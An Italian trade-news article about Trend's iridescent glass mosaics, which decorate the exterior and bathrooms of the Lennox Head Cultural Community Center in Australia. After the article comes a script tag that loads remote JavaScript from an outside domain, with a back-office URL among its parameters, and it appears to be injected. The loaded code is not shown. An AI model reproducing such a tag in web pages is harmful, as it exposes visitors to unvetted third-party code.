1. Home
  2. Notizie e Mercato
  3. Trend, da Vicenza all’Australia

Trend, da Vicenza all’Australia

Finiture e rivestimenti di
5/5
votato da 1 persone
La qualità del made in Italy e l’originalità dei mosaici Trend entrano a far parte della vita sociale di Lennox Head (nell’australiano Nuovo Galles del Sud)


Trend, azienda vicentina specializzata nella produzione di mosaici pregiati in vetro e oro, smalti e agglomerati in graniglia di vetro, quarzo e granito per interni ed esterni, ha impresso un segno duraturo della qualità e del design Made in Italy nel paesaggio di Lennox Head, località turistico balneare del Nuovo Galles del Sud, Australia.

Non nuova a importanti commesse internazionali, tra cui il grande mosaico nella hall dell’Auditorium del Louvre a Lens e il rivestimento in foglia d’oro della Torre dell’Orologio a La Mecca, Trend ha portato a termine i lavori di decorazione a mosaico degli esterni e dei bagni del Lennox Head & Cultural Community Center.

Situata all’angolo tra Mackney Lane e Park Lane, nel cuore dell’abitato di Lennox Head, la nuova struttura polifunzionale è destinata a essere luogo d’incontro per tutti i membri della comunità. Il complesso architettonico, infatti, comprende un palazzetto dello sport, un Auditorium, un’area per bambini, tre sale riunioni e un salone attività, oltre a essere la sede della biblioteca civica.  Per la decorazione degli esterni e dei bagni del Cultural Community Center, progettato in stile contemporaneo-moderno dall’architetto John Gray, la scelta è caduta sui mosaici della collezione Shining di Trend, utilizzati in 5 differenti varianti cromatiche.

Realizzate in pasta vitrea semitrasparente colorate in fusione, le tessere di mosaico Shining si caratterizzano per il particolare effetto iridescente ottenuto aggiungendo a caldo nell’impasto soluzioni coloranti a base di metalli semipreziosi, in particolare l’Iridio. Trattandosi di un intervento a caldo, l’iridescenza è pressoché inalterabile, resistendo all’azione di agenti chimici e atmosferici e agli effetti dell’usura.

Oltre all’immagine di qualità e di assoluta affidabilità acquisita in sede internazionale, a favore dell’assegnazione a Trend della commessa relativa al Lennox Head & Cultural Community Center ha giocato la filosofia eco-friendly dell’azienda vicentina. Le tessere di mosaico della collezione Shining, infatti, sono prodotte utilizzando fino al 59% di vetro da riciclo post consumo.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.37670912242560783" type="text/javascript"></script>